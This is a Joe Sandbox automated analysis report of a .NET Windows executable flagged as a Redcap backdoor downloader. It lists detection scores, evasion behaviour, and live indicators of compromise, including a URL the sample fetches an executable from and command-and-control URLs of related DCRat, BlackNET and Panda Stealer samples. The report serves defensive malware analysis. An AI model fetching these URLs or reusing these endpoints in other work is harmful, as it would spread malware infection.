Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
01US71QGnu.exe

Overview

General Information

Sample name:01US71QGnu.exe
renamed because original name is a hash value
Original sample name:80baf79ba445e39b66046225825ed38d4a3a8a34b2fd63ed14a907f41ffb2726.exe
Analysis ID:1504063
MD5:4505703b220fa0679096c65fefb6d832
SHA1:9584421b46e5641072a95f95c505d4dd7a414a44
SHA256:80baf79ba445e39b66046225825ed38d4a3a8a34b2fd63ed14a907f41ffb2726
Tags:exe
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info

Classification

  • System is w10x64
  • 01US71QGnu.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\01US71QGnu.exe" MD5: 4505703B220FA0679096C65FEFB6D832)
    • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://a1023269.xsph.ruAvira URL Cloud: Label: malware
Source: http://a1023269.xsph.ru/yhjjk.exeTAvira URL Cloud: Label: malware
Source: http://a1023269.xsph.ru/yhjjk.exeAvira URL Cloud: Label: malware
Source: a1023269.xsph.ruVirustotal: Detection: 9%Perma Link
Source: http://a1023269.xsph.ruVirustotal: Detection: 9%Perma Link
Source: http://a1023269.xsph.ru/yhjjk.exeVirustotal: Detection: 5%Perma Link
Source: http://a1023269.xsph.ru/yhjjk.exeTVirustotal: Detection: 8%Perma Link
Source: 01US71QGnu.exeVirustotal: Detection: 47%Perma Link
Source: 01US71QGnu.exeReversingLabs: Detection: 54%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: 01US71QGnu.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\ADMIN\source\repos\ConsoleApp1\ConsoleApp1\obj\Release\wqb.pdb source: 01US71QGnu.exe
Source: global trafficHTTP traffic detected: GET /yhjjk.exe HTTP/1.1Host: a1023269.xsph.ruConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 141.8.197.42 141.8.197.42
Source: Joe Sandbox ViewIP Address: 141.8.197.42 141.8.197.42
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /yhjjk.exe HTTP/1.1Host: a1023269.xsph.ruConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: a1023269.xsph.ru
Source: 01US71QGnu.exe, 00000000.00000002.1677567169.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, 01US71QGnu.exe, 00000000.00000002.1677567169.0000000002998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023269.xsph.ru
Source: 01US71QGnu.exeString found in binary or memory: http://a1023269.xsph.ru/yhjjk.exe
Source: 01US71QGnu.exe, 00000000.00000002.1677567169.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023269.xsph.ru/yhjjk.exeT
Source: 01US71QGnu.exe, 00000000.00000002.1677567169.00000000029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023269.xsph.rud
Source: 01US71QGnu.exe, 00000000.00000002.1677567169.000000000298C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 01US71QGnu.exe, 00000000.00000000.1663752237.0000000000652000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewqb.exe8 vs 01US71QGnu.exe
Source: 01US71QGnu.exe, 00000000.00000002.1676997268.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 01US71QGnu.exe
Source: 01US71QGnu.exeBinary or memory string: OriginalFilenamewqb.exe8 vs 01US71QGnu.exe
Source: 01US71QGnu.exe, a1b2c3.csSuspicious URL: 'http://a1023269.xsph.ru/yhjjk.exe'
Source: classification engineClassification label: mal68.winEXE@2/2@1/1
Source: C:\Users\user\Desktop\01US71QGnu.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\01US71QGnu.exe.logJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: 01US71QGnu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 01US71QGnu.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\01US71QGnu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 01US71QGnu.exeVirustotal: Detection: 47%
Source: 01US71QGnu.exeReversingLabs: Detection: 54%
Source: unknownProcess created: C:\Users\user\Desktop\01US71QGnu.exe "C:\Users\user\Desktop\01US71QGnu.exe"
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: fwpuclnt.dllJump to behavior
Source: 01US71QGnu.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 01US71QGnu.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 01US71QGnu.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\ADMIN\source\repos\ConsoleApp1\ConsoleApp1\obj\Release\wqb.pdb source: 01US71QGnu.exe
Source: 01US71QGnu.exeStatic PE information: 0xBEF1DB58 [Tue Jul 7 19:02:48 2071 UTC]
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeMemory allocated: EC0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeMemory allocated: 4920000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeWindow / User API: threadDelayed 1374Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeWindow / User API: threadDelayed 508Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7612Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7612Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7612Thread sleep time: -99890s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7612Thread sleep time: -99781s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7612Thread sleep time: -99671s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7612Thread sleep time: -99559s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7612Thread sleep time: -99453s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7612Thread sleep time: -99343s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7612Thread sleep time: -99228s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7624Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 7600Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 99890Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 99781Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 99671Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 99559Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 99453Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 99343Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 99228Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: 01US71QGnu.exe, 00000000.00000002.1676997268.0000000000A84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeQueries volume information: C:\Users\user\Desktop\01US71QGnu.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System2
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media2
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection
NTDS12
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
01US71QGnu.exe47%VirustotalBrowse
01US71QGnu.exe54%ReversingLabsWin32.Backdoor.Redcap
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
a1023269.xsph.ru9%VirustotalBrowse
SourceDetectionScannerLabelLink
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://a1023269.xsph.ru100%Avira URL Cloudmalware
http://a1023269.xsph.rud0%Avira URL Cloudsafe
http://a1023269.xsph.ru/yhjjk.exeT100%Avira URL Cloudmalware
http://a1023269.xsph.ru/yhjjk.exe100%Avira URL Cloudmalware
http://a1023269.xsph.ru9%VirustotalBrowse
http://a1023269.xsph.ru/yhjjk.exe5%VirustotalBrowse
http://a1023269.xsph.ru/yhjjk.exeT8%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
a1023269.xsph.ru
141.8.197.42
truefalseunknown
NameMaliciousAntivirus DetectionReputation
http://a1023269.xsph.ru/yhjjk.exetrue
  • 5%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://a1023269.xsph.ru01US71QGnu.exe, 00000000.00000002.1677567169.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, 01US71QGnu.exe, 00000000.00000002.1677567169.0000000002998000.00000004.00000800.00020000.00000000.sdmptrue
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name01US71QGnu.exe, 00000000.00000002.1677567169.000000000298C000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://a1023269.xsph.ru/yhjjk.exeT01US71QGnu.exe, 00000000.00000002.1677567169.0000000002921000.00000004.00000800.00020000.00000000.sdmptrue
  • 8%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
http://a1023269.xsph.rud01US71QGnu.exe, 00000000.00000002.1677567169.00000000029A4000.00000004.00000800.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
141.8.197.42
a1023269.xsph.ruRussian Federation
35278SPRINTHOSTRUfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1504063
Start date and time:2024-09-04 14:08:04 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 1m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:01US71QGnu.exe
renamed because original name is a hash value
Original Sample Name:80baf79ba445e39b66046225825ed38d4a3a8a34b2fd63ed14a907f41ffb2726.exe
Detection:MAL
Classification:mal68.winEXE@2/2@1/1
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 21
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
  • Execution Graph export aborted for target 01US71QGnu.exe, PID 7544 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
TimeTypeDescription
08:08:54API Interceptor9x Sleep call for process: 01US71QGnu.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
141.8.197.42LisectAVT_2403002A_442.exeGet hashmaliciousDCRatBrowse
  • a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN
PMDfwr7Jal.exeGet hashmaliciousDCRatBrowse
  • a0583448.xsph.ru/HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp
quotation.docGet hashmaliciousUnknownBrowse
  • a0862680.xsph.ru/djlipantro2.1.exe
HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exeGet hashmaliciousBlackNETBrowse
  • f0575824.xsph.ru/blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1
442.111).lnkGet hashmaliciousUnknownBrowse
  • a0705880.xsph.ru/selection/seedling.txt
htmlayout.dllGet hashmaliciousUnknownBrowse
  • a0747694.xsph.ru/serv.php
qRsw2oZH24.exeGet hashmaliciousPanda StealerBrowse
  • crimestreetsru.ru.xsph.ru/collect.php
svchost.exeGet hashmaliciousPanda StealerBrowse
  • asdqwezxc.ru.xsph.ru/collect.php
btwGaban.exeGet hashmaliciousCollectorGoomba, Panda StealerBrowse
  • a0680922.xsph.ru/collect.php
v8YnxUbz23.exeGet hashmaliciousAmadey RedLine SmokeLoader Tofsee VidarBrowse
  • a0620960.xsph.ru/5.exe
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
SPRINTHOSTRUTP7s9GhJLn.exeGet hashmaliciousDCRatBrowse
  • 141.8.197.42
N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
  • 141.8.197.42
SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfGet hashmaliciousSmokeLoaderBrowse
  • 185.251.91.119
40830001.xlsGet hashmaliciousSmokeLoaderBrowse
  • 185.251.91.119
2ZJuaB7CQ4.exeGet hashmaliciousDCRatBrowse
  • 141.8.194.149
5P9EdUgv5r.exeGet hashmaliciousDCRatBrowse
  • 141.8.194.149
06wRHV3NYY.exeGet hashmaliciousDCRatBrowse
  • 141.8.192.103
bfderfg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
  • 141.8.197.42
YMtjYvZX2i.exeGet hashmaliciousDCRatBrowse
  • 141.8.197.42
p7oBHwDt23.exeGet hashmaliciousDCRatBrowse
  • 141.8.197.42
No context
No context
Process:C:\Users\user\Desktop\01US71QGnu.exe
File Type:CSV text
Category:modified
Size (bytes):1058
Entropy (8bit):5.356262093008712
Encrypted:false
SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
MD5:B2EFBF032531DD2913F648E75696B0FD
SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
Malicious:true
Reputation:moderate, very likely benign file
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
Process:C:\Users\user\Desktop\01US71QGnu.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):35
Entropy (8bit):1.6763889527583498
Encrypted:false
SSDEEP:3:RRRntLQ:LFtLQ
MD5:2E0078F8FCCA6F98D2E7F01CAD6B9A3F
SHA1:F347AAA233CDD587CAF8A508C6AB5C33B6C6ADAE
SHA-256:96B0954F573C5D8AFA2A02753A2EBBACB9B3D680D5C138889FD0D3A418590A14
SHA-512:76BEC5B715AC5E1169710AD29BBC8E09A00E02307ADDF980011FECD62DCEFFD8DE43FBFCCF3BC36A09D6FD74A5DC3CDF68E4DB535A8FCDD0459425BC35B2300D
Malicious:false
Reputation:low
Preview:????????? ??????: URL ??????????...
File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):5.15779834813011
TrID:
  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
  • Win32 Executable (generic) a (10002005/4) 49.78%
  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
  • Generic Win/DOS Executable (2004/3) 0.01%
  • DOS Executable Generic (2002/1) 0.01%
File name:01US71QGnu.exe
File size:9'728 bytes
MD5:4505703b220fa0679096c65fefb6d832
SHA1:9584421b46e5641072a95f95c505d4dd7a414a44
SHA256:80baf79ba445e39b66046225825ed38d4a3a8a34b2fd63ed14a907f41ffb2726
SHA512:9c5a3d625bec802fdb406026bd492c355d369be3362ed908e52bed66e0be6b01f79ccaa3b74e38dcf8116ea19aa28fdcd9abb4d1ca8ec116057d55bf5504a4a2
SSDEEP:96:HraIiZVZgdEIk6LNzs58kNgqkFA2LkrF0WsRMlcRuBNgkE+rCrMWCxdiITjU9SFz:f/kaORO9LUGtb+WrgRTjVd8EUK
TLSH:B612E9079FE8D733E92F067C5DB293434372F7029922EBAE7C4E75862D26254025279B
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............."...0..............;... ...@....@.. ....................................`................................
Icon Hash:90cececece8e8eb0
Entrypoint:0x403bee
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0xBEF1DB58 [Tue Jul 7 19:02:48 2071 UTC]
TLS Callbacks:
